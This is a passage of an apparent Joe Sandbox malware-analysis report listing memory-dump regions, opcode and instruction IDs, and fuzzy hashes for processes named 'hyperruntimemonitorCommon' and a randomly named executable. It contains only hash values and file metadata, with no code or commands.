                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4098ddb26ab8880c4d61696ac8c464c9d176febd02ecc208faed5339288b87fb
                                                            • Instruction ID: e073c4d489374da0a9bebfe1483f64d3d82b2eccf565b0ade366bf266adb1b12
                                                            • Opcode Fuzzy Hash: 4098ddb26ab8880c4d61696ac8c464c9d176febd02ecc208faed5339288b87fb
                                                            • Instruction Fuzzy Hash: 5C112711B9C567C6E738A28880749F47772FF94341B244B79F04B9B4CAC828F895979D
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b05466824eba0e7756de322d1a53c316c4daf8730f0984a174968da76dc768e
                                                            • Instruction ID: 6e3125daaa12fd4d6756ce8a4c480ab47a963c3afd49fed4630ed0fa3907b911
                                                            • Opcode Fuzzy Hash: 2b05466824eba0e7756de322d1a53c316c4daf8730f0984a174968da76dc768e
                                                            • Instruction Fuzzy Hash: FA319870E0962D8EEBA8EB54C8587B8B6F1EB58341F5140E9D00DE72A5DE786BC48F04
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eb0032ff44249e4e6ac18c091d5e77aeb8c6412ce9e0d459dea2ca5924f3dfa
                                                            • Instruction ID: 6a1cd8d9976adb4c85d3fd66adf5d77930a62c4a6d2a7aa436a99ee83a251ce6
                                                            • Opcode Fuzzy Hash: 7eb0032ff44249e4e6ac18c091d5e77aeb8c6412ce9e0d459dea2ca5924f3dfa
                                                            • Instruction Fuzzy Hash: F511BC13F8D1978BF23976E418724BD6770AF653A0F1802BAF44EA60C6DC0C3851A39A
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1adec7cf2d47861dee5a02f0b19a79e0333fbe5fa29b18c027109d9748173a67
                                                            • Instruction ID: 74f6666492fa41f6a7ac57036a6b5be5ef9882ccd77bbd2e3f99c331b7a84d58
                                                            • Opcode Fuzzy Hash: 1adec7cf2d47861dee5a02f0b19a79e0333fbe5fa29b18c027109d9748173a67
                                                            • Instruction Fuzzy Hash: DE11C122B09A0E4FEB68BB6494218F973E0EF59364B40063AE04FC71D2DE28B9058790
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a99e9356a646b6640561fee94239b312520c8fab821b582c78e5e73c9553688e
                                                            • Instruction ID: 1b146c4182b1318ce53f3815cd6cfdb0addcbf5c0caebef1ea4995f251ae4e19
                                                            • Opcode Fuzzy Hash: a99e9356a646b6640561fee94239b312520c8fab821b582c78e5e73c9553688e
                                                            • Instruction Fuzzy Hash: A0110422B18A0B4FEB68FB6484608F973B0EF55391F10063AE04FC75C2CE28B9068280
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0207bce6e56fb1b3499b44974c5039d49d00b97843d278ce759aa45f7717f91f
                                                            • Instruction ID: ea04e5644c55e8097ed7acb28a601589841de07b12e6d3f6ea044aabc194fd8e
                                                            • Opcode Fuzzy Hash: 0207bce6e56fb1b3499b44974c5039d49d00b97843d278ce759aa45f7717f91f
                                                            • Instruction Fuzzy Hash: 1D110832B0E69D8EE322A768CC212F97B70EB52311F0646B3D051DB1E3CA781605CB95
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b606481a4e23ab6d2d891cb02fc6b4cb4ce6bd2836b99f11c61e29c13471660
                                                            • Instruction ID: c9e8827ee26aac7bec92a7ec40281d59f38d797565248b72bb21f9cc72c122a3
                                                            • Opcode Fuzzy Hash: 3b606481a4e23ab6d2d891cb02fc6b4cb4ce6bd2836b99f11c61e29c13471660
                                                            • Instruction Fuzzy Hash: 49116B3374950B8FE728AA98D460AF933A0EF65391F11023BE80EC32C1DF29A9518790
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63f871a9dc9a2381a545eef9cd68b67bec67b3b79590528fc734a7ba0ee1bfb9
                                                            • Instruction ID: daacc77fc9ab1893114464ef2ff92613e011300466544bc63fb299f643acf085
                                                            • Opcode Fuzzy Hash: 63f871a9dc9a2381a545eef9cd68b67bec67b3b79590528fc734a7ba0ee1bfb9
                                                            • Instruction Fuzzy Hash: 22112B3374990F8FE729AA58D4656F933A0EF69351F11423BE50EC32D2DE29A950C780
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3684b0f91924beffab93fb0bc2a32d5446edadb23272e298855c36717578252c
                                                            • Instruction ID: 6146a032acdfc0d4b07076bcd3ec472bc546666b7947a3a9ebd51baa9541223e
                                                            • Opcode Fuzzy Hash: 3684b0f91924beffab93fb0bc2a32d5446edadb23272e298855c36717578252c
                                                            • Instruction Fuzzy Hash: 8811E731A0D69D8EE322AB64CC202FA7B70EB52311F0645B3D051DB1E3CA381605CB55
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: da548b0f8afd01e5f7c415475369f36bf8ff3f893ee35c0c8d147e6844707ef7
                                                            • Instruction ID: d37316b1728836565a707ae103532e9cdeecc27fcc8ce344fb84e3afaf2dd3b1
                                                            • Opcode Fuzzy Hash: da548b0f8afd01e5f7c415475369f36bf8ff3f893ee35c0c8d147e6844707ef7
                                                            • Instruction Fuzzy Hash: 2801F172E0864E5FFB74A6A844286BD3AF5DF4A3C0F010576F00AF7192ED696C468284
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1db9fffd24f3d5bfb26da34fa4658816c67e152174c0d4499cbd238e28fff9a9
                                                            • Instruction ID: f62dfe3775ff58c6917e75969ea85db560bb26c810b96b62568f600c98d66d9a
                                                            • Opcode Fuzzy Hash: 1db9fffd24f3d5bfb26da34fa4658816c67e152174c0d4499cbd238e28fff9a9
                                                            • Instruction Fuzzy Hash: 2F11E770E0962D8AEFB4EB54C8657B8B2F1EB18341F1151F9D00DE32A5DEB86A848F44
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eeb2fd880524d5009ec777109d19b0eb8b58b13096868ea6845b07da869aa7ed
                                                            • Instruction ID: c413cda4525f7ecb246e4553f2fa7f861b01d73d09d7f79bd74eaac88d9c8ce3
                                                            • Opcode Fuzzy Hash: eeb2fd880524d5009ec777109d19b0eb8b58b13096868ea6845b07da869aa7ed
                                                            • Instruction Fuzzy Hash: FCF02871F0CA094FE79CEB68582A6B873D1EF98365B10013FE04FC32A2DE216C424381
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 890decece96ca97724cc677c83741bdacb91ebdb8e3ce402f6af1cd729cf32d0
                                                            • Instruction ID: 803fac4ce849f47b091fb74205c2e1febeb5fba4fc0bf379ec43a1ece7d71ef3
                                                            • Opcode Fuzzy Hash: 890decece96ca97724cc677c83741bdacb91ebdb8e3ce402f6af1cd729cf32d0
                                                            • Instruction Fuzzy Hash: 5111E571A0D28D8FE322AB64CC202AA7B70EB43311F0641A7D051DB1E3CA381604CB95
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f570a401db46c56a818a654d23e24a0cf32f1d1db6177a4f34a1988f678213f
                                                            • Instruction ID: 091fe91949120833c78d5aa8ba202dca1b0ea07c53dcd911e8d6568434dc3176
                                                            • Opcode Fuzzy Hash: 2f570a401db46c56a818a654d23e24a0cf32f1d1db6177a4f34a1988f678213f
                                                            • Instruction Fuzzy Hash: FC11B670E0962D8AEBB5EB54C8647B8B2F1EB18741F1151E9C00DA32A5DEB86AC48F44
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75202f4cf33ffebf01ac887c29a4adf2ea748f493271b68e7abb96848933df12
                                                            • Instruction ID: 21909358f7d245b621b36fd58c88e9dfbab9e5a104fd905ac2ff5500a32bd341
                                                            • Opcode Fuzzy Hash: 75202f4cf33ffebf01ac887c29a4adf2ea748f493271b68e7abb96848933df12
                                                            • Instruction Fuzzy Hash: 3E01D271A0E28E8FE722ABA4CC242BA7B70EF47315F0641A3D051DB1E3CA781604CB55
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 640a19bc31a455694686feede304ad451cf8bd52523907732b5576bfae1657d6
                                                            • Instruction ID: e7efde51245d802084043a77fc318f160688894569c22089732c9ee1000d3772
                                                            • Opcode Fuzzy Hash: 640a19bc31a455694686feede304ad451cf8bd52523907732b5576bfae1657d6
                                                            • Instruction Fuzzy Hash: 90F03C63F5885B4AEB68FAD884649FD77B0FF58358F500135F00DA6299CE2478038A40
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a30e6de1cacb1cd7fd95736e2a48de50217055f51a6cd44fe131d5bf0bb28af
                                                            • Instruction ID: f649fde0008135657c1dd2c891508fa1628f0fc4543b67acec5d3e0a84691974
                                                            • Opcode Fuzzy Hash: 1a30e6de1cacb1cd7fd95736e2a48de50217055f51a6cd44fe131d5bf0bb28af
                                                            • Instruction Fuzzy Hash: 08F0623298E3C69FD726DBB088655D57FB4AF42214B2900F6E04A870A2C56D161AC761
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                            • Instruction ID: fb18dddd758f36bbf10ce767d60f151e7f74f906af857af7f2d427c65a9bcf4d
                                                            • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                            • Instruction Fuzzy Hash: B1010070A5992D8FDFA9EB48C8A4BA8B7B1FB68305F1041D9800EE3650CB319A84CF05
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f853e97bf0826e1003ca3f20af8ea7869ef7500a22e3a6126a24846951f9110
                                                            • Instruction ID: 2bc825edc7f02ecfbbf218c3003d67e2e9a3e7893f08dccb5f6028ab0a55d4c2
                                                            • Opcode Fuzzy Hash: 3f853e97bf0826e1003ca3f20af8ea7869ef7500a22e3a6126a24846951f9110
                                                            • Instruction Fuzzy Hash: 62F01D30A0564E9EEBA0EF98D4596FE77A0FF94314F114537F41CC21A0DAB46294CB84
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be408df01aacdb96ecdd3ff8e43f57de41e27010f1def3d28125f0710b3e947d
                                                            • Instruction ID: 1c13cc58e340742cea8d1e12029a10b3aff30dc64e6eed5c781cdd71deb03ce0
                                                            • Opcode Fuzzy Hash: be408df01aacdb96ecdd3ff8e43f57de41e27010f1def3d28125f0710b3e947d
                                                            • Instruction Fuzzy Hash: 5EF0F022A0D2C34FDB32AFA48CA11A83FB0EF0734070C4AFAD4848B0D3C6683425D329
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfba36932688c6da5d486041e62b7c5f1e93bdf14c5eec1d7f858d2721153114
                                                            • Instruction ID: 27ba1fb7a90ee876154a51bc9dde3b90ff96f695861d2e67ec95bf2f1a6a4ba4
                                                            • Opcode Fuzzy Hash: cfba36932688c6da5d486041e62b7c5f1e93bdf14c5eec1d7f858d2721153114
                                                            • Instruction Fuzzy Hash: 37F0FE32E5481E8BEB64FB98D4605BDB7B1FF98358F500135E00DA6695CE2468428B40
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a1649f39fc17f7bf0455d9a66c558d3249437cf20e21c77dfb3e878a1b0e291
                                                            • Instruction ID: 6de935b2ed774e7ef712522c3767d7e7efef1117e2fe3e83171b0df287ed59c0
                                                            • Opcode Fuzzy Hash: 3a1649f39fc17f7bf0455d9a66c558d3249437cf20e21c77dfb3e878a1b0e291
                                                            • Instruction Fuzzy Hash: 2EF0123091564E9FDB90EFA4C8496EE77E0FF54304F114566F81CD21A0DA70A6A4CB80
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37a46e2a384aa077baf2983c8a7bc998b0c90f5ccab626579c352a78ccb57f7d
                                                            • Instruction ID: cfd69c4265c2c8c3364f8d86c1089c607a2793c03d7a910f304295d35a5e96c0
                                                            • Opcode Fuzzy Hash: 37a46e2a384aa077baf2983c8a7bc998b0c90f5ccab626579c352a78ccb57f7d
                                                            • Instruction Fuzzy Hash: 1EF0B270E0A52D8EEBB4EB54D8647B9B3B0EB58301F1194E9844DA3291CEB86B858F44
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8e339f20e5e48b914703db6273be165b7b115bef3b756a7ab6dc62454010bf8a
                                                            • Instruction ID: 7be1de02a24639c90569f6001c011d10770ede9e56e2747794da22b230e879ec
                                                            • Opcode Fuzzy Hash: 8e339f20e5e48b914703db6273be165b7b115bef3b756a7ab6dc62454010bf8a
                                                            • Instruction Fuzzy Hash: 2CE0C932E6861FCEDFA4EB94C8615FEB671FF88390F5005B5E01EE2181DB2829509B54
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74c065fb97fb7d9b49e6c0306eed1e0c2d7b9b663f16cc28f0aeb43a6d96bc70
                                                            • Instruction ID: 41291b80e9041731637cae388296fb899d8980f39b9223239dc8adcc5b326545
                                                            • Opcode Fuzzy Hash: 74c065fb97fb7d9b49e6c0306eed1e0c2d7b9b663f16cc28f0aeb43a6d96bc70
                                                            • Instruction Fuzzy Hash: C1E0DF3289D68ACFDB71EB6089660EC7F70BF00380F5441E7F409A61C2DF656648A2CA
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc478f81338339a9e7b67b68587f1a7342221ffdb81ed51880d121482f6afd1c
                                                            • Instruction ID: e8cd65709fc99d99db9bebb3f870392a39b5de62fc2bfbbd3d60d34c46e9ea43
                                                            • Opcode Fuzzy Hash: bc478f81338339a9e7b67b68587f1a7342221ffdb81ed51880d121482f6afd1c
                                                            • Instruction Fuzzy Hash: B2E0C202B4D3C34BF7365BB808710282FA08F073C4B0509F7E1869A1C3C8583C059359
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e15335fce2a005867354f12403eebba08cd1e7d2ccb225504393dcaf98379df
                                                            • Instruction ID: c40cf456356f1be3f41a4bacd99590fc3e4df598358da5447052b2ce8faccd4c
                                                            • Opcode Fuzzy Hash: 2e15335fce2a005867354f12403eebba08cd1e7d2ccb225504393dcaf98379df
                                                            • Instruction Fuzzy Hash: 21D0C92AB8D61785F33976C1803033A11B26F00B80F60403EF55F629C1CF1DF916A20B
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 445811cac002c9797581079496545b8161e7237ed3f51e2590f8b1d6af6e8d22
                                                            • Instruction ID: bcb2a66a895c787f11f82a8a980f47f45af60065839a6dac8f19c0dd652cf3a7
                                                            • Opcode Fuzzy Hash: 445811cac002c9797581079496545b8161e7237ed3f51e2590f8b1d6af6e8d22
                                                            • Instruction Fuzzy Hash: 53D01257B8D55B8AF37CB6C2413167D65B08F09380EA0047EF09F718D6CD1DB901A619
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2029460942.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bc70000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95ef5629ce1bccd08a89323ff04574e5cd045fe9973a558ceaea86ca7f7795a9
                                                            • Instruction ID: bc03124914b1fa2befb18201d212cd5c0d5e18464ccd50089dd3a6ee66e965ab
                                                            • Opcode Fuzzy Hash: 95ef5629ce1bccd08a89323ff04574e5cd045fe9973a558ceaea86ca7f7795a9
                                                            • Instruction Fuzzy Hash: 0831F670E18A1DCFCF84DF98D491AEDBBF1FB69300F60116AD419E3291CA35A941CB44
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2029460942.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bc70000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebb158bac23c883a25e138dbc5d3f50fe1447e85c54bf13eea66cd092a1f58e4
                                                            • Instruction ID: 23f4f46785523fdd546a9aa543b4e7179214d686b2664c2e76c3972a987d4dde
                                                            • Opcode Fuzzy Hash: ebb158bac23c883a25e138dbc5d3f50fe1447e85c54bf13eea66cd092a1f58e4
                                                            • Instruction Fuzzy Hash: 5ED01207B1B97713E57174AE68B25FD1740EFD09B9B9AA133E15D460932C2EA6470050
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: cffe3f7790561c7d5580bef8b8bb27a7d2a8360f80f20ebc3f78de5ee12ebd44
                                                            • Instruction ID: f5e71a5ccbc74444670a9ebf0b8951558bac5ee9fef493e3804ac383fd9071cb
                                                            • Opcode Fuzzy Hash: cffe3f7790561c7d5580bef8b8bb27a7d2a8360f80f20ebc3f78de5ee12ebd44
                                                            • Instruction Fuzzy Hash: 0E415C16B0942A45E329B7FD78219FD6B448FA933FB0843B7F85E8D0C78D086081C2E9
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83d8dec71b2d9442843c1f76601452eeedd494613814b4336dddb12e4ba32525
                                                            • Instruction ID: 13eb0fe832505ca29079dd7f5447c723054221b11cf2f34b1a94e5b8e4424323
                                                            • Opcode Fuzzy Hash: 83d8dec71b2d9442843c1f76601452eeedd494613814b4336dddb12e4ba32525
                                                            • Instruction Fuzzy Hash: F9A1D271A19A4D8FE798DB68C8657A97FE1FF9A310F5102BED048D72E6CB741801C741
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85c854b7106670faf94da1dd8d61d6c9e98cffaf61162683931575d415075284
                                                            • Instruction ID: d2c7d6a31be2b13867037fb3546975a4ac7137167e74c0df0ff773d058b566c5
                                                            • Opcode Fuzzy Hash: 85c854b7106670faf94da1dd8d61d6c9e98cffaf61162683931575d415075284
                                                            • Instruction Fuzzy Hash: 21417131E0891D8FDB54EF98D895AEDB7A1FF68315F00067AE40DD729ACE34A841CB80
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c883b9597618560b6ddc45b1f2ea82b95da67328e7116394b6e3a39befd97ff9
                                                            • Instruction ID: 872dcf6319c581b7a188638450100e47a4bc6f05ead5a5c81d67ce6201956ef8
                                                            • Opcode Fuzzy Hash: c883b9597618560b6ddc45b1f2ea82b95da67328e7116394b6e3a39befd97ff9
                                                            • Instruction Fuzzy Hash: 93517C30A0490E9FCF84EF98D494EEDBBF1FF58325B054169E419E7260DA74E990CB90
